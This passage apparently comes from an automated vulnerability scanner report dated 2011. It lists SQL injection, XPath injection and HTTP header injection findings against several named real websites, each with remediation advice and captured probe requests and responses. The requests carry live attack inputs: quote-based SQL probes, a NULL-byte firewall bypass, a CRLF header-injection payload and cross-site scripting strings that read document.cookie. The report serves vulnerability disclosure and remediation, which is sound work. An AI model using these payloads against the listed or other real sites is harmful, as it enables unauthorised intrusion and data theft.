26.23. http://www.kasimer-ittig.com/domainserve/puview

26.24. http://www.kasimer-ittig.com/domainserve/viewStats

26.25. http://www.shsl.com/

26.26. http://www.storchbrenner.com/

26.27. http://www.usdirectory.com/istat.aspx

26.28. http://www.vault.com/com.vault.home.portlets/homepage_flash.swf

26.29. http://www.w3.org/TR/html4/DTD/strict.dtd

26.30. http://www.w3.org/TR/html4/strict.dtd

27. Content type is not specified

27.1. http://ads.bluelithium.com/st

27.2. http://cim.meebo.com/cmd/tc

27.3. http://guru.sitescout.com/favicon.ico



1. SQL injection
There are 10 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://lt.navegg.com/g.lt [ltcid cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://lt.navegg.com
Path:   /g.lt

Issue detail

The ltcid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ltcid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltcid=547362597'

Response 1

HTTP/1.1 500 Internal Server Error
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Content-Type: text/html
Content-Length: 369
Date: Wed, 19 Jan 2011 18:01:20 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

Request 2

GET /g.lt?nvst=12596&nvtt=z&nvup=1&nvgpflid=547362597 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltcid=547362597''

Response 2

HTTP/1.1 200 OK
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 20-Jan-2011 06:01:21 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 18:01:21 GMT
Server: lighttpd/1.4.19
Content-Length: 45

tuple=" ";
ltload();
ltsetid("547362597''");

1.2. http://navegg.boo-box.com/sc.lt [id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://navegg.boo-box.com
Path:   /sc.lt

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /sc.lt?id=' HTTP/1.1
Host: navegg.boo-box.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Content-Type: text/html
Content-Length: 369
Date: Wed, 19 Jan 2011 18:09:52 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

Request 2

GET /sc.lt?id='' HTTP/1.1
Host: navegg.boo-box.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: inf=''_0_0_0_0_0_0_0-0-0-0-0; path=/; domain=.boo-box.com; expires=Wed, 19-Jan-2012 12:09:52 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 18:09:52 GMT
Server: lighttpd/1.4.19
Content-Length: 23


var NaveggBoobox=1;

1.3. http://v6test.cdn.att.net/image/special2.jpg [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://v6test.cdn.att.net
Path:   /image/special2.jpg

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /image/special2.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 16:50:03 GMT
Last-Modified: Wed, 19 Jan 2011 16:50:03 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 5532
Content-Type: text/html
X-Cache: MISS from 12.120.38.41
Age: 35
X-Cache: HIT from 12.120.79.21
Via: 1.1 12.120.38.41:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.21:80 (cache/2.6.2.2.16.ATT)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>AT&a
...[SNIP]...
<strong>http://www.yellowpages.com/Washington-DC74302&#037;3Cimg&#037;20src&#037;3da&#037;20onerror&#037;3dalert&#040;document.cookie&#041;&#037;3E9c7a66be0e0/Attorneys</strong>
...[SNIP]...

Request 2

GET /image/special2.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00''
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 16:49:53 GMT
Last-Modified: Wed, 19 Jan 2011 16:49:53 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 5422
Content-Type: text/html
X-Cache: HIT from 12.120.38.42
Age: 45
X-Cache: HIT from 12.120.79.20
Via: 1.1 12.120.38.42:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.20:80 (cache/2.6.2.2.16.ATT)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>AT&a
...[SNIP]...

1.4. http://www.ebglaw.com/showoffice.aspx [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=og0sit55134r4kyfq5mdkl3n; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 25

500 Internal Server Error

Request 2

GET /showoffice.aspx HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2 (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jan 2011 15:48:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=cjknstzb1jhxzoedkedo5kji; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...

1.5. http://www.fulbright.com/index.cfm [FUSEACTION parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The FUSEACTION parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the FUSEACTION parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?FUSEACTION=home.299'&pf=y HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 5: Incorrect syntax near ''.
</font>
...[SNIP]...

1.6. http://www.fulbright.com/index.cfm [article_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The article_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the article_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=news.detail&article_id=9405'&site_id=286 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 12: Incorrect syntax near ''.
</font>
...[SNIP]...

1.7. http://www.fulbright.com/index.cfm [emp_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The emp_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emp_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=attorneys.detail&site_id=299&emp_id=377' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 60: Incorrect syntax near ''.
</font>
...[SNIP]...

1.8. http://www.fulbright.com/index.cfm [eventID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=seminars.detail&eventID=5575'&site_id=492 HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:51:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 4: Incorrect syntax near ''.
</font>
...[SNIP]...

1.9. http://www.fulbright.com/index.cfm [fuseaction parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The fuseaction parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the fuseaction parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=home.285' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 5: Incorrect syntax near ''.
</font>
...[SNIP]...

1.10. http://www.fulbright.com/index.cfm [site_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The site_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the site_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.cfm?fuseaction=news.site&site_id=299' HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 15:49:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                       <!-- " ---></TD></TD></TD></TH></T
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
[Macromedia][SQLServer JDBC Driver][SQLServer]Line 9: Incorrect syntax near ''.
</font>
...[SNIP]...

2. XPath injection
There are 2 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://www.hoganlovells.com/FCWSite/Img [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Img

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /FCWSite'/Img HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 16:02:52 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8083

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParseNodeTest(AstNode qyInput, AxisType axisType, XPathNodeType nodeT
...[SNIP]...

2.2. http://www.hoganlovells.com/FCWSite/Img [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hoganlovells.com
Path:   /FCWSite/Img

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /FCWSite/Img' HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Wed, 19 Jan 2011 16:06:15 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7846

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +2007289
MS.Internal.Xml.XPath.XPathScanner.NextLex() +5069503
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +5052705
MS.Internal.Xml.XPath.
...[SNIP]...

3. HTTP header injection
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://accuserve.homestead.com/files/a_ripple.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accuserve.homestead.com
Path:   /files/a_ripple.swf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload acc91%0d%0af14ecc46de1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /files/acc91%0d%0af14ecc46de1 HTTP/1.1
Host: accuserve.homestead.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 19 Jan 2011 15:20:44 GMT
Location: /files/acc91
f14ecc46de1
/


3.2. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

